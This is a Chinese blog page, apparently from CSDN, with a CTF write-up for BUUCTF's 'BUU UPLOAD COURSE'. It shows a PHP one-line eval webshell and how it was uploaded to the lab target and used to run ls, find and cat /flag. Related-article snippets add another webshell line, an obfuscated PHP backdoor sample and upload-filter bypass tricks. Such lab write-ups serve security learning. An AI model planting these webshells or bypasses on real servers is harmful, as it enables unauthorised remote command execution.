靶机高安全上传php木马,BUU UPLOAD COURSE | 一句话木马实操(PHP)

最新推荐文章于 2024-04-08 21:22:02 发布
最新推荐文章于 2024-04-08 21:22:02 发布
阅读量932 收藏 1
点赞数
文章标签: 靶机高安全上传php木马

BUU UPLOAD COURSE | 一句话木马实操(PHP)

这是一道上传一句话木马的裸题,解题思路也很明确,现在此详细记录,以供日后复习知识点用

一句话木马:当知道了URL,就可以利用本地一张网页进行连接得到Webshell

php 一句话木马

当这条语句被服务端执行了,我们同时利用 POST 请求上传变量 x 的值,例如 x=echo ‘Hello’

php 解析器执行的实质上是 @eval("echo ‘Hello’"),即在前端输出一个字符串

更常见的利用手法是利用 @eval(system($_POST["x"])) 直接控制服务端的 shell

20200725002339-5f1b7b8bd5711.png

同时提交 x=ls ,便可以通过 shell 输出当前网页目录下的其他文件,注入其他命令同理

实操

题目链接

用浏览器连接靶机,有一个可以提交文件的页面,随便 sumbit 一个文本文件

20200725002340-5f1b7b8cef64e.png

提示:文件已储存在: uploads/xxx.jpg

可以在 ?file=uploads/xxx.jpg 查看,有相应的内容回显

这是一个最普通的 php 脚本,保存改后缀为 .php 尝试上传

在访问时回显 Hello Worl! 说明自定义的 php 脚本被成功执行

把脚本修改成一句话木马

成功上传后,访问相应的 ?file=uploads/xxx.jpg,页面空白,说明 php 命令被成功执行

将 url 复制到 Postman ,编辑 Body(Post 的表单)为 x:ls

20200725002343-5f1b7b8f9398b.png

成功拿到 shell,接下来找到 flag 所在的目录就好了

你甚至可以提交 x:find -name / ‘flag‘ 暴力找,最后提交 cat /flag 拿到 flag

想知道不知道但想知道
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 2995
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
网络安全夺旗5个flag靶机详细实操教程
06-14
详细介绍从环境搭建到,攻破靶机的每一个详细步骤,命令,截图和部分原理解释,非常适合初学者联系用。参考引用了部分大牛的策略,但有所改进。
upload 靶机上传漏洞利用教学(含代码分析).doc
09-16
php 上传漏洞大演练。推荐使用Windows系统搭建,我最先使用docker pull c0ny1/upload-labs的镜像在Pass-03遇到问题,初步判断是该镜像内的php.conf文件配置错误导致。
上传webshell(入侵目标页面主机靶机演示)
weixin_45571987的博客
09-14 1941
上传webshell新手演示写好一句话木马寻找页面上传点(上传木马)寻找上传后的文件位置(绝对路径)连接上目标主机找到目标flag 写好一句话木马 <?php eval(@$_POST['shell']); ?> webshell的分类 ①根据文件大小分类:大和小(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:jsp、asp、aspx、php 写成php形式 寻找页面上传点(上传木马) 在上一篇内容中我们知道了如何用sqlmap注入获取后台的账号密码,登录
BUU UPLOAD COURSE 1-文件上传(1),网络安全开发面试问题回答技巧
最新发布
m0_60452293的博客
04-08 338
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。(img-EcbncQVo-1712582509632)]试辅导),让我们一起学习成长!
php网站上传木马,php一句话木马怎么上传
weixin_29955195的博客
03-09 2296
一句话木马上传常见的几种方法:1、利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束...
tp 如果被上传.php木马文件怎么处理
qq_42289686的博客
06-01 953
有很多网站被黑,导致网站关键词 网站标题 被修改,更可恶的是你如果发现的晚,关键词都被收录进去了,搞得很麻烦。 这是被上传php文件之一, <?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['g
文件上传漏洞
m0_70683009的博客
05-21 1108
如果对方中间件是apache属于低版本,我们可以利用文件上传上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
文件上传——不为人知的木马上传大法
weixin_30480075的博客
05-25 1302
文件上传第一式(禁JS) (1)来到第一关,我们查看源代码: 上图可以发现,上传的限制代码块写在js函数内,因此我们可以考虑将js的开关禁掉,直接上传木马的方式,其实,似乎也可以不禁js,直接burp抓包后修改图片类型,一样可以上传成功。 (2)上传一句话木马.php,发现直接上传成功,然后在页面进行复制图像地址,可以查看到上传的 <?php eval($_P...
wrodpress怎么上传php木马,一个 Wordpress 木马样本分析
weixin_42518678的博客
03-18 484
在饭否看到zuola说得到一个wordpress木马脚本,于是就点了连接,并简单的看了看这个样本。原理比较简单,先判断访问来源是否是搜索引擎的蜘蛛或bot,再确定是否显示一个有问题iframe——木马的效力也取决于这个iframe中的内容。这一小段PHP脚本也完全可以用在饭否看到zuola说得到一个wordpress木马脚本,于是就点了连接,并简单的看了看这个样本。原理比较简单,先判断访问来源是否...
BUUCTF做题Upload-Labs记录pass-11~pass-20
Goodric的博客
07-26 583
白名单上传:`'jpg','png','gif'` 上传抓包可以看到url中的结构。
BUUCTF__[ACTF2020 新生赛]Upload_题解
风过江南乱的博客
07-07 1655
BUUCTF__[ACTF2020 新生赛]Upload_题解
OWASP靶机安全学习、测试
05-24
OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用...
2021年山东省职业院校技能大赛网络安全赛项C模块Linux靶机
04-29
3.靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限; 4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限...
文件上传upload-labs(一)
01-08
文件上传漏洞 通过上传攻击性文件(木马,病毒,恶意脚本)绕过检测到服务器并执行; 个人觉得不喜欢这些概念,通过实操更加能理解和掌握;...新建一个PHP文件,使用一句话木马上传 提示我们文件类型不符合要求要上
BUU LFI COURSE 11(解题分享)
TinFrog的博客
07-17 287
BUU LFI COURSE 11(解题分享)
中国蚁剑 配置使用
Z_l123的博客
01-13 5755
1.编写一句话木马,并命名为muma.php 2.利用靶机的文件上传漏洞,将此木马文件( Webshell )上传靶机 1)打开dvwa网站 2)成功登录DVWA网站后,在网站主页左侧菜单选择 DVWA Security,将网站的安全级别设置为"Low": 3)在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡,将muma.php上传靶机,并记下文件上传的路径: 3.利用"中国蚁剑"连接靶机上的 muma.php 1)打开中国蚁剑 2)在
BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)
小谢的博客
10-25 2538
BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)题解
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
BUU SQL COURSE 1
07-27
BUU SQL COURSE 1是一个关于SQL注入的课程。在这个课程中,学习者将学习如何通过注入恶意代码来绕过数据库的安全措施,从而获取敏感信息。课程内容包括找到注入点、闭合语句、带入语句进行爆破等技术。通过这些技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值